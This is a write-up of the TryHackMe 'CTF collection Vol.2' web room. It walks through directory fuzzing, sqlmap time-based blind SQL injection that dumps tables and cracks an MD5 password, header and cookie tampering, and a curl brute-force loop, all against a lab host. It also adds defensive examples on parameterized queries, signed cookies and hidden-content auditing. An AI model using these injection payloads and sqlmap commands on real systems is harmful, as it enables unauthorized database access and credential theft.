THM-CTF collection Vol.2-Writeup
Sharpening up your CTF skill with the collection. The second volume is about web-based CTF.
Find This Room: CTF collection Vol.2
Initial Enum
whoami@mint:~/Desktop/THM-Lab/CTFCollectionVol.2$ ffuf -u http://10.10.118.177/FUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt -t 35 -e .php,.html,.txt
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.1.0
________________________________________________
:: Method : GET
:: URL : http://10.10.118.177/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
:: Extensions : .php .html .txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 35
:: Matcher : Response status: 200,204,301,302,307,401,403
________________________________________________
.hta [Status: 403, Size: 285, Words: 21, Lines: 11]
.hta.php [Status: 403, Size: 289, Words: 21, Lines: 11]
.hta.html [Status: 403, Size: 290, Words: 21, Lines: 11]
.htaccess.html [Status: 403, Size: 295, Words: 21, Lines: 11]
.hta.txt [Status: 403, Size: 289, Words: 21, Lines: 11]
.htaccess [Status: 403, Size: 290, Words: 21, Lines: 11]
.htaccess.txt [Status: 403, Size: 294, Words: 21, Lines: 11]
.htpasswd.php [Status: 403, Size: 294, Words: 21, Lines: 11]
.htpasswd.html [Status: 403, Size: 295, Words: 21, Lines: 11]
.htpasswd.txt [Status: 403, Size: 294, Words: 21, Lines: 11]
.htpasswd [Status: 403, Size: 290, Words: 21, Lines: 11]
.htaccess.php [Status: 403, Size: 294, Words: 21, Lines: 11]
button [Status: 200, Size: 37980, Words: 268, Lines: 228]
cat [Status: 200, Size: 60065, Words: 522, Lines: 350]
cgi-bin/ [Status: 403, Size: 289, Words: 21, Lines: 11]
cgi-bin/.html [Status: 403, Size: 294, Words: 21, Lines: 11]
index [Status: 200, Size: 94328, Words: 356, Lines: 86]
index.php [Status: 200, Size: 94328, Words: 356, Lines: 86]
index.php [Status: 200, Size: 94328, Words: 356, Lines: 86]
iphone [Status: 200, Size: 19286, Words: 56, Lines: 218]
login [Status: 301, Size: 314, Words: 20, Lines: 10]
robots [Status: 200, Size: 430, Words: 46, Lines: 6]
robots.txt [Status: 200, Size: 430, Words: 46, Lines: 6]
robots.txt [Status: 200, Size: 430, Words: 46, Lines: 6]
server-status [Status: 403, Size: 294, Words: 21, Lines: 11]
Easter 1
Easter 2
We go back to robots.txt again, where we find an encoded URL.
View the page source:
<html>
<head>
<title> A slow clap for you</title>
<h1 style="text-align:center;">A slow clap for you</h1>
</head>
<body>
<p style="text-align:center;"><img src="kim.png"/></p>
<p style="text-align:center;">Not bad, not bad.... papa give you a clap</p>
<p style="text-align:center;color:white;">Easter 2: THM{REACTED}</p>
</body>
</html>
Easter 3
We have a login page, so let's open it:
login [Status: 301, Size: 314, Words: 20, Lines: 10]
Easter 4
For this flag we intercept the login POST request, save it as a text file (I called it r.txt), and hand that request to sqlmap so it can test the POST parameters for SQL injection.
whoami@mint:~/Desktop/THM-Lab/CTFCollectionVol.2$ sqlmap -r r.txt --dbs --batch
___
__H__
___ ___["]_____ ___ ___ {1.8.7#pip}
|_ -| . [(] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 00:44:44 /2024-11-23/
[00:44:44] [INFO] parsing HTTP request from 'r.txt'
[00:44:44] [INFO] resuming back-end DBMS 'mysql'
[00:44:44] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=admin' AND (SELECT 8089 FROM (SELECT(SLEEP(5)))khRt) AND 'nfnb'='nfnb&password=admin&submit=submit
---
[00:44:47] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 13.04 or 12.04 or 12.10 (Raring Ringtail or Quantal Quetzal or Precise Pangolin)
web application technology: Apache 2.2.22, PHP 5.3.10
back-end DBMS: MySQL >= 5.0.12
[00:44:47] [INFO] fetching database names
[00:44:47] [INFO] fetching number of databases
[00:44:47] [INFO] resumed: 4
[00:44:47] [INFO] resumed: information_schema
[00:44:47] [INFO] resuming partial value: THM_f0und_m
[00:44:47] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[00:45:21] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[00:45:22] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[00:45:35] [INFO] retrieved:
[00:45:54] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[00:45:54] [INFO] retrieved:
available databases [2]:
[*] information_schema
[*] THM_f0und_m3
whoami@mint:~/Desktop/THM-Lab/CTFCollectionVol.2$ sqlmap -r r.txt -D THM_f0und_m3 --tables --batch
Database: THM_f0und_m3
[2 tables]
+----------------+
| user |
| nothing_inside |
+----------------+
whoami@mint:~/Desktop/THM-Lab/CTFCollectionVol.2$ sqlmap -r r.txt -D THM_f0und_m3 -T nothing_inside --columns --batch
Database: THM_f0und_m3
Table: nothing_inside
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| Easter_4 | varchar(30) |
+----------+-------------+
whoami@mint:~/Desktop/THM-Lab/CTFCollectionVol.2$ sqlmap -r r.txt -D THM_f0und_m3 -T nothing_inside -C Easter_4 --dump --batch
Database: THM_f0und_m3
Table: nothing_inside
[1 entry]
+-------------------------+
| Easter_4 |
+-------------------------+
| THM{Snip} |
+-------------------------+
Easter 5
For flag number 5, we keep digging in the database for credentials: two users are available, and only one of them has an MD5 hash as its password.
whoami@mint:~/Desktop/THM-Lab/CTFCollectionVol.2$ sqlmap -r r.txt -D THM_f0und_m3 -T user --columns --batch
Database: THM_f0und_m3
Table: user
[2 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(40) |
| username | varchar(30) |
+----------+-------------+
Now we have the password, but only in the form of a hash. If you run sqlmap with --batch, it will automatically try to crack it with its built-in dictionary attack:
Database: THM_f0und_m3
Table: user
[2 entries]
+------------------------------------------+
| password |
+------------------------------------------+
| 05f3672(Snip)d00070d1b |
| He is a nice guy, say hello for me |
+------------------------------------------+
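The login form sqlmap just went through has the two weaknesses this section relies on: user input spliced into the SQL text, and passwords stored as bare MD5 (which is why sqlmap's dictionary check can recover them). The following is an added defensive example, my own code and not the room's or the writeup's, showing the fixed backend side by side with the broken query pattern. It uses an in-memory SQLite table as a stand-in for the MySQL database, the DesKel / example-password credential is constructed, and the username payload sqlmap reported is quoted only to show how the two query styles treat the same input.

```python
import hashlib
import hmac
import os
import sqlite3

# The username payload sqlmap reported for the login form, quoted here so both
# query styles below can be fed the same input (it is never executed).
SQLMAP_USERNAME_PAYLOAD = "admin' AND (SELECT 8089 FROM (SELECT(SLEEP(5)))khRt) AND 'nfnb'='nfnb"

PBKDF2_ITERATIONS = 200_000


def hash_password(password, salt=None):
    """Return a self-describing salted PBKDF2-HMAC-SHA256 string (replaces bare MD5)."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return "pbkdf2_sha256$%d$%s$%s" % (PBKDF2_ITERATIONS, salt.hex(), digest.hex())


def verify_password(password, stored):
    """Recompute the hash with the stored salt and compare in constant time."""
    _algo, iterations, salt_hex, digest_hex = stored.split("$")
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                    bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(candidate.hex(), digest_hex)


# Hash of an unused password, verified for unknown usernames so the response
# time does not reveal whether a username exists.
DUMMY_HASH = hash_password("unused-dummy-password")


def build_db():
    """In-memory table mirroring the two columns sqlmap listed (username, password)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (username TEXT PRIMARY KEY, password TEXT NOT NULL)")
    conn.execute("INSERT INTO user VALUES (?, ?)",
                 ("DesKel", hash_password("example-password")))  # constructed credential
    conn.commit()
    return conn


def vulnerable_query(username):
    """BEFORE: input spliced into the SQL text, the pattern the time-based injection exploits.
    Only the resulting string is shown; the quote in the input closes the literal early."""
    return "SELECT password FROM user WHERE username = '%s'" % username


def login(conn, username, password):
    """AFTER: bound parameter, so quotes in the username are data and never SQL syntax."""
    row = conn.execute("SELECT password FROM user WHERE username = ?", (username,)).fetchone()
    if row is None:
        verify_password(password, DUMMY_HASH)  # equalise timing for unknown users
        return False
    return verify_password(password, row[0])


def demo():
    conn = build_db()
    return {
        "spliced_query": vulnerable_query(SQLMAP_USERNAME_PAYLOAD),
        "payload_login": login(conn, SQLMAP_USERNAME_PAYLOAD, "admin"),
        "real_login": login(conn, "DesKel", "example-password"),
        "wrong_password": login(conn, "DesKel", "admin"),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "->", value)
```

Two things worth noticing when you run it: the spliced query shows the payload's leading quote terminating the string literal, which is exactly what sqlmap needs, while the bound version simply finds no user with that name. And because every PBKDF2 hash carries its own random salt, two users with the same password get different stored values, so the one-lookup dictionary attack that worked on the MD5 column no longer applies.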
Easter 6
For flag number 6, the question's hint tells us to check the main page's headers. Checking the response headers gives us the flag.
whoami@mint:~/Desktop/THM-Lab/CTFCollectionVol.2$ curl -I http://10.10.118.177/
HTTP/1.1 200 OK
Date: Fri, 22 Nov 2024 23:38:59 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.3.10-1ubuntu3.26
Busted: Hey, you found me, take this Easter 6: THM{Snip}
Set-Cookie: Invited=0
Vary: Accept-Encoding
Content-Type: text/html
Easter 7
In this challenge we have to use the “Invited” cookie with Burp Suite: we pass it a number that we would have to guess or brute-force, but obviously it's a one. That is the right invite cookie value, and you'll get the flag.
Easter 8
For flag number 8, the front page's source code says you have to be on an iPhone to access the content. All you have to do is change the User-Agent header of your request from the original one to an iPhone one, and you get the flag.
Easter 9
Visit the /ready page with Burp intercepting each request, check the page's source code, and you get flag number 9.
Booom!
Easter 10
For flag number 10, you need to send a GET request with the Referer header set to ‘tryhackme.com’ to get the flag back from the page.
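Easter 7, 8 and 10 (and the Egg header in Easter 18 later on) all work because the server makes an access decision on a value the client fully controls: a cookie, the User-Agent, the Referer. Headers like User-Agent and Referer should never gate anything; state the server wants to keep in a cookie can be protected by signing it. Here is an added example, my own code rather than anything from the room, of the Invited cookie check in its naive form next to an HMAC-signed version. The secret key is generated on the spot for the demo and the cookie format (value, a dot, a hex tag) is my own convention.

```python
import hashlib
import hmac
import secrets

# Constructed per-process secret; a real service loads it from configuration so
# that every instance signs and verifies with the same key.
SECRET_KEY = secrets.token_bytes(32)


def parse_cookie_header(header):
    """Turn 'a=1; b=2' into {'a': '1', 'b': '2'} (duplicate names: last one wins)."""
    cookies = {}
    for part in header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            cookies[name.strip()] = value.strip()
    return cookies


def naive_is_invited(cookie_header):
    """BEFORE: the check the room implies, trusting whatever Invited= the client sends."""
    return parse_cookie_header(cookie_header).get("Invited") == "1"


def _mac(value):
    return hmac.new(SECRET_KEY, value.encode(), hashlib.sha256).hexdigest()


def issue_invited_cookie(invited):
    """Server side: emit 'Invited=<value>.<hmac>' so the value cannot be edited unnoticed."""
    value = "1" if invited else "0"
    return "Invited=%s.%s" % (value, _mac(value))


def signed_is_invited(cookie_header):
    """AFTER: accept Invited=1 only when the attached tag was produced with our key."""
    raw = parse_cookie_header(cookie_header).get("Invited", "")
    value, sep, tag = raw.rpartition(".")
    if not sep:
        return False                      # unsigned cookie: treat as not invited
    if not hmac.compare_digest(tag, _mac(value)):
        return False                      # value edited, or signed by someone else
    return value == "1"


def demo():
    """Replay the room's trick: the server set Invited=0, the client rewrites it to 1."""
    issued = issue_invited_cookie(False)                        # Invited=0.<tag>
    tampered = issued.replace("Invited=0.", "Invited=1.", 1)    # tag no longer matches
    return {
        "naive_accepts_edit": naive_is_invited("Invited=1"),
        "signed_rejects_edit": signed_is_invited(tampered),
        "signed_accepts_genuine": signed_is_invited(issue_invited_cookie(True)),
        "signed_rejects_unsigned": signed_is_invited("Invited=1"),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "->", value)
```

Signing only stops silent edits; it does not hide the value, and a signed "Invited=1" can still be replayed by whoever holds it, so the cookie should also carry an expiry and be scoped with HttpOnly and Secure. The simpler fix is to keep the invited flag in a server-side session and send the client nothing but an opaque session id.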
Easter 11
Among the options on the main page there are four choices, and we can see that DesKel prefers egg. Sending egg instead of salad makes DesKel happy, and we get flag number 11.
Easter 12
Don't worry, there are always hints in the questions; no need to stress about reading, doing is much easier. Anyway, there is JavaScript code in the page: go check it, and you'll find a function there containing our flag.
Easter 13
Flag number 13 is related to flag 9: follow the same lead as for 9, same approach, check the source code.
Easter 14
Flag 14 is straightforward: the main page's source code contains the flag as a PNG encoded in base64. Decode it and read the flag off the picture.
Open CyberChef and paste the base64 we found.
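CyberChef does the decoding in one go, but it is worth seeing what the decoder actually has to check before it trusts the bytes it got back. The block below is an added example, my own code and not something from the room, that pulls base64 PNG payloads out of page source, verifies the PNG signature and every chunk CRC, and reports the image dimensions from IHDR. It assumes the image is embedded as a data: URI (the writeup does not reproduce the actual markup) and builds its own small PNG as constructed sample input so it runs offline.

```python
import base64
import re
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"


def _chunk(kind, data):
    """Encode one PNG chunk: length, type, data, CRC32 over type+data."""
    crc = zlib.crc32(kind + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + kind + data + struct.pack(">I", crc)


def make_sample_png(width, height):
    """Constructed stand-in for the room's image: an 8-bit greyscale white rectangle."""
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 0, 0, 0, 0)
    scanlines = b"".join(b"\x00" + b"\xff" * width for _ in range(height))  # filter 0 per row
    return (PNG_SIGNATURE + _chunk(b"IHDR", ihdr)
            + _chunk(b"IDAT", zlib.compress(scanlines)) + _chunk(b"IEND", b""))


# Constructed page source; the real room's markup is not reproduced in the writeup.
SAMPLE_HTML = ('<html><body><p>Easter 14</p>\n<img src="data:image/png;base64,%s"/>\n'
               '</body></html>' % base64.b64encode(make_sample_png(40, 12)).decode())

DATA_URI_RE = re.compile(r'data:image/png;base64,([A-Za-z0-9+/=]+)')


def extract_png_data_uris(html):
    """Return every base64 payload carried in a data:image/png URI."""
    return DATA_URI_RE.findall(html)


def parse_png(blob):
    """Check signature and chunk CRCs; return width, height and chunk list, or raise."""
    if not blob.startswith(PNG_SIGNATURE):
        raise ValueError("not a PNG: bad signature")
    pos, chunks, width, height = len(PNG_SIGNATURE), [], None, None
    while pos + 12 <= len(blob):
        length, kind = struct.unpack(">I4s", blob[pos:pos + 8])
        data = blob[pos + 8:pos + 8 + length]
        (crc,) = struct.unpack(">I", blob[pos + 8 + length:pos + 12 + length])
        if zlib.crc32(kind + data) & 0xFFFFFFFF != crc:
            raise ValueError("corrupt chunk %r" % kind)
        if kind == b"IHDR":
            width, height = struct.unpack(">II", data[:8])
        chunks.append(kind.decode("ascii"))
        pos += 12 + length
        if kind == b"IEND":
            break
    if width is None or not chunks or chunks[-1] != "IEND":
        raise ValueError("truncated PNG")
    return {"width": width, "height": height, "chunks": chunks}


def is_valid_png(blob):
    try:
        parse_png(blob)
        return True
    except (ValueError, struct.error):
        return False


def decode_embedded_pngs(html):
    """Decode each embedded image and report its structure (dimensions, chunks)."""
    results = []
    for payload in extract_png_data_uris(html):
        blob = base64.b64decode(payload, validate=True)   # reject stray characters
        results.append(parse_png(blob))
    return results


if __name__ == "__main__":
    for info in decode_embedded_pngs(SAMPLE_HTML):
        print(info)
```

The CRC check is the practical part: if you copy the base64 out of a page and a character goes missing, `b64decode(validate=True)` or the chunk CRC will tell you before you waste time on a picture that will not render.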
Easter 15
For this Flag, we will play some guessing games, don’t get emotional about it, but you are going to lose some brain cells.
Each letter maps to a specific hash number; work out the letter behind each number in the hint and you'll get the flag.
Option 1: Manual Enumeration
This approach requires us to manually enter all 26 letters of the alphabet into the text box and correlate them with the respective values we receive in return. Not too painful and certainly doable.
Once we have built a table with the mappings, we can decode the numbers we were given earlier by the task (hints: 51 89 77 93 126 14 93 10).
Option 2: Automate with Linux-fu
While this method may initially seem slower than manual input, requiring time to craft an HTTP POST request and develop a bash script for automation, it offers scalability and reusability for future CTF challenges with minimal adjustments. It’s the Maverick way!
We first need to capture a request using Burp, then save it and convert it to a curl command. The next step is to cycle through the letters (A-Z) using a for loop and passing them to “answer=”.
Of course, you need to edit the hostname/URL of the target server.
#!/bin/bash
# Submit every upper- and lower-case letter to the game form and record the hash the page returns
for letter in {A..Z} {a..z}; do
  response=$(curl -X POST -H "Host: ctfvol2.thm" -H "User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0" -H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8" -H "Accept-Language: en-US,en;q=0.5" -H "Accept-Encoding: gzip, deflate" -H "Content-Type: application/x-www-form-urlencoded" -H "Origin: http://ctfvol2.thm" -H "Referer: http://ctfvol2.thm/game1/" -H "Cookie: Invited=0" -H "Upgrade-Insecure-Requests: 1" --data "answer=$letter" --compressed --silent http://ctfvol2.thm/game1/)
  # Pull the number out of the "<p>Your hash: NNN" line of the response
  hash=$(echo "$response" | grep -oP '<p>Your hash:\s+\K\d+')
  echo "$letter : $hash"
done
Save the bash script as answer.sh and make the file executable:
whoami@mint:~/Desktop/THM-Lab/CTFCollectionVol.2$ chmod +x answer.sh
Run the script and sit back:
whoami@mint:~/Desktop/THM-Lab/CTFCollectionVol.2$ ./answer.sh
A : 99
B : 100
C : 101
D : 102
E : 103
F : 104
G : 51
H : 52
I : 53
J : 54
K : 55
L : 56
M : 57
N : 58
O : 126
P : 127
Q : 128
R : 129
S : 130
T : 131
U : 136
V : 137
W : 138
X : 139
Y : 140
Z : 141
a : 89
b : 90
c : 91
d : 92
e : 93
f : 94
g : 95
h : 41
i : 42
j : 43
k : 75
l : 76
m : 77
n : 78
o : 79
p : 80
q : 81
r : 10
s : 11
t : 12
u : 13
v : 14
w : 15
x : 16
y : 17
z : 18
We now have the correct mappings and we finally can start decoding the numbers provided to us by the task.
51 : G
89 : a
77 : m
93 : e
126 : O
14 : v
93 : e
10 : r
Easter 16
Flag number 16 is very easy: click all three buttons on the page at once, and you'll get flag number 16.
Let’s examine a typical request by pressing one of the buttons and intercepting the request using Burp.
Easter 17
On the main website, either in Burp or your browser’s “Inspector”, review the source code of the webpage. You’ll find a binary-encoded message embedded in the function catz()
The hint suggests we need to perform the following operations to decode it: Binary → Decimal → Hex → ASCII code
We have several options:
- dCode.fr Cipher Identifier does it in one fell swoop:
- or use this script:
# Binary string lifted from the catz() function in the page source
b = '100010101100001011100110111010001100101011100100010000000110001001101110011101000100000010101000100100001001101011110110110101000110101010111110110101000110101010111110110101100110011011100000101111101100100001100110110001100110000011001000011001101111101'
# Binary -> decimal: int() accepts any bit length, so a dropped leading zero is harmless
d = int(b, 2)
print(d)  # Print the decimal representation
# Decimal -> hexadecimal, left-padded to an even number of digits so fromhex() accepts it
h = hex(d)[2:]
h = h.zfill(len(h) + len(h) % 2)
print(h)  # Print the hexadecimal representation
# Hexadecimal -> ASCII
ascii_text = bytes.fromhex(h).decode('ascii')
# Print the ASCII representation
print(ascii_text)
Easter 18
This task seems to be straightforward. We need to send an additional parameter called “Egg” with the value “Yes” in the request header and hopefully, we will be rewarded with a flag.
Easter 19
The hint on this one did not make a lot of sense at first until I found the said “thick dark line” under the text “DID YOU KNOW: All swans in England belong to the queen.”
Inspecting the page in the browser shows that there is a PNG image which has been set with a height of 2 pixels, resulting in a thin, barely visible line. Since the width is set to 2000 pixels, the image will be stretched horizontally, making it appear as a long, thin line across the width of 2000 pixels.
<img height="2" width="2000" src="small.png"/>
Changing the value from “2” to “200” should make this look slightly bigger and more visible.
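Easter 19 and Easter 2 hide content the same way: it is in the HTML, just styled so a person looking at the rendered page will not see it (white text, a 2-pixel-high image). When reviewing a page, or auditing your own site for content that should not be shipped, it helps to scan the markup for exactly these tricks. The block below is an added example, my own code and not from the room, built on the standard-library HTML parser; the sample page and the THM{REDACTED} placeholder are constructed to mirror the two cases the writeup shows, and the style and size thresholds are heuristics of my choosing.

```python
from html.parser import HTMLParser

# Constructed sample mirroring the two tricks above: text coloured white (Easter 2)
# and an image squashed to a 2-pixel-high strip (Easter 19). Flag text is a placeholder.
SAMPLE_HTML = """<html><body>
<p style="text-align:center;color:white;">Easter 2: THM{REDACTED}</p>
<p>DID YOU KNOW: All swans in England belong to the queen.</p>
<img height="2" width="2000" src="small.png"/>
<p><img src="kim.png"/></p>
</body></html>"""

VOID_TAGS = {"img", "br", "hr", "input", "meta", "link"}
TINY_PIXELS = 5   # an image with any side at or below this is treated as a hidden strip

# Inline-style declarations that make an element invisible (heuristic list)
HIDING_VALUES = {
    "color": ("white", "#fff", "#ffffff"),
    "display": ("none",),
    "visibility": ("hidden",),
    "opacity": ("0",),
    "font-size": ("0", "0px"),
}


def hiding_reason(style):
    """Return 'prop:value' for the first declaration that hides the element, else None."""
    decls = {}
    for decl in style.lower().split(";"):
        prop, sep, value = decl.partition(":")
        if sep:
            decls[prop.strip()] = value.strip()
    for prop, hidden_values in HIDING_VALUES.items():
        if decls.get(prop) in hidden_values:
            return "%s:%s" % (prop, decls[prop])
    return None


class HiddenContentAuditor(HTMLParser):
    """Collect elements whose style or dimensions keep them off-screen for a casual viewer."""

    def __init__(self):
        super().__init__()
        self.findings = []
        self._open = []      # stack of (tag, index into findings or None) for open elements

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        idx = None
        reason = hiding_reason(a.get("style", ""))
        if reason:
            self.findings.append({"tag": tag, "reason": "style hides content (%s)" % reason, "text": ""})
            idx = len(self.findings) - 1
        if tag == "img":
            dims = [int(a[k]) for k in ("height", "width") if a.get(k, "").isdigit()]
            if dims and min(dims) <= TINY_PIXELS:
                self.findings.append({"tag": tag, "text": "",
                                      "reason": "tiny image %sx%s src=%s"
                                      % (a.get("width"), a.get("height"), a.get("src"))})
        if tag not in VOID_TAGS:
            self._open.append((tag, idx))

    def handle_data(self, data):
        # Text inside a hidden element is what we actually want to read
        for _tag, idx in self._open:
            if idx is not None:
                self.findings[idx]["text"] += data

    def handle_endtag(self, tag):
        for i in range(len(self._open) - 1, -1, -1):
            if self._open[i][0] == tag:
                del self._open[i:]
                break


def audit_hidden_content(html):
    parser = HiddenContentAuditor()
    parser.feed(html)
    parser.close()
    return parser.findings


if __name__ == "__main__":
    for finding in audit_hidden_content(SAMPLE_HTML):
        print(finding)
```

Only inline styles are inspected; content hidden through a stylesheet class or a script would need the computed style from a browser, which is what the Inspector gives you. The same auditor run over your own templates before release is a cheap way to catch debug text and images that were meant to be removed rather than merely hidden.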
Easter 20
For the last Easter Egg, we remember having seen a hint in the source code of the main page while working on other tasks. Search for “easter 20”.
Simply adding the data “username=DesKel&password=heIsDumb” to the Burp request body and changing the method from GET to POST does not work.
We are missing a key piece: the Content-Type: application/x-www-form-urlencoded header. It is essential because it tells the server the format of the data in the HTTP request body; in this case, URL-encoded form data.
When you send data in a POST request, the server needs to know how to interpret that data. The Content-Type header specifies the media type of the request body, which lets the server parse it correctly.
This is what our Burp Request looks like now:
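To make the Content-Type point concrete, here is an added example (my own code, not the room's or the writeup's) of both ends of the exchange: a function that builds the raw POST request Burp sends, with or without the header, and a minimal server-side parser that, like PHP populating $_POST, only reads form fields when the body is declared as application/x-www-form-urlencoded. The username and password are the values quoted above; the host comes from the earlier bash script and the path "/" is an assumption.

```python
from urllib.parse import parse_qs, urlencode

FORM_TYPE = "application/x-www-form-urlencoded"


def build_post_request(host, path, fields, content_type=FORM_TYPE):
    """Build the raw HTTP/1.1 POST Burp would send; content_type=None omits the header."""
    body = urlencode(fields).encode()
    lines = ["POST %s HTTP/1.1" % path, "Host: %s" % host, "Content-Length: %d" % len(body)]
    if content_type:
        lines.append("Content-Type: %s" % content_type)
    return "\r\n".join(lines).encode() + b"\r\n\r\n" + body


def parse_form_request(raw):
    """Minimal server view: form fields are parsed only when Content-Type says the body is a form."""
    head, _sep, body = raw.partition(b"\r\n\r\n")
    request_line, *header_lines = head.decode("iso-8859-1").split("\r\n")
    method = request_line.split(" ", 1)[0]
    headers = {}
    for line in header_lines:
        name, _sep, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    body = body[:int(headers.get("content-length", "0"))]
    # Media type only; parameters such as ';charset=utf-8' do not change the decision
    media_type = headers.get("content-type", "").split(";", 1)[0].strip().lower()
    fields = {}
    if method == "POST" and media_type == FORM_TYPE:
        fields = {k: v[0] for k, v in parse_qs(body.decode(), keep_blank_values=True).items()}
    return {"method": method, "content_type": media_type or None, "fields": fields}


def demo():
    creds = {"username": "DesKel", "password": "heIsDumb"}   # the values used above
    without = build_post_request("ctfvol2.thm", "/", creds, content_type=None)
    with_header = build_post_request("ctfvol2.thm", "/", creds)
    return {"without_header": parse_form_request(without)["fields"],
            "with_header": parse_form_request(with_header)["fields"]}


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "->", value)
```

Without the header the body arrives intact but the server has no reason to treat it as a form, so the username and password are simply never read; that is the failure the first Burp attempt ran into. The parser also trims the body to Content-Length, which is what a real server does and why Burp recalculates that header whenever you edit the body.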